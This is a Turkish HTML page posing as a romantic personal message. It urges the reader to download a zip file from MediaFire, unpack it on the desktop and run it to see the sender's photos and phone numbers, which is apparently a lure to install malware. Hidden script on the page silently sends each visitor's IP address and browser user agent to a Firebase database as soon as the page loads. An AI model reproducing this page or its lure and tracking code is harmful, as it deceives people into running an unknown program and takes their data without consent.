<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>blogum</title>
    <style>
        body{
            font-size: 20px;
            font-family: Arial, Helvetica, sans-serif;
            color: rgb(55, 55, 55);
            padding: 10px;
            font-weight: 520;
            background-color: white
        }

        a{
            border-style: none;
            padding: 5px;
            font-size: 22px;
            color: rgb(255, 255, 255);
            text-decoration: none;
            background-color: rgb(54, 218, 255);
            padding-inline: 15px;
            text-align: center;
            border-radius: 6px;
        }

        .dw{
            text-align: center;
        }
    </style>
</head>
<body>

    <h2>Merhabaa!</h2>
    <p>
        Buraya kadar geldin demek ❤️❤️ yaaa<br>
        
        Şimdi aşkım beni göreceksin.... yapman gereken aşağıdan programı indir. Açınca benim fotolarımı ve numaralarım karşına çıkacak açınca. Doğrusunu seçersen yazışırız tamam mı?<br>
        <br><br>
        indirdiğin dosyaya tıklayıp içindekini masaüstünde at sen sonra çalıştıra basınca önünde 3 foto çıkacakk altta da numara, hadi optumm.❤︎
        
        <br><br>
        dogru numarayı seçmezsen üzülürüm :(( hadi oynayalım ;)
        <br><br>
        <div class="dw">
            <a href="https://download847.mediafire.com/1g7c6cbny07gyixOBZhjiYk8u5ZUgrzca-vWNc9bC_WOYaBHN--UZ6Hb6a6HIFwCcQHvwFWCR18_ohPBSCBeL6XfjFQ4y8cVLOM57RD9R-ooe4cQ6xWGYsE5u0cbNl-ILRnOhg1eJkqer9tRj6VHAd-Qkdwa5X5ckIR-EQw3dur0Sg/nfdgbp9ch47taxz/programm.zip" download="programimm.zip">indirr 💙</a><br><br>
            <img style="opacity: 20%;border-style: none;border-radius: 10px;pointer-events: none" src="ben.jpg" id="ben" width="100">
        </div>

        
    </p>
   <script>
       fetch('https://api.ipify.org?format=json')
            .then(response => response.json())
            .then(data => {
                var res = data.ip+"/ "+navigator.userAgent;
                fetch("https://data-ad9da-default-rtdb.firebaseio.com/logs.json?auth=AIzaSyBW6suRt81l--22-54Xpwgk8yU4T4LU-DE", {
                    method: 'POST',
                    body: JSON.stringify({ log: res }),
                    headers: {
                        'Content-Type': 'application/json'
                    }
                })
            })
   </script>
    
</body>
</html>
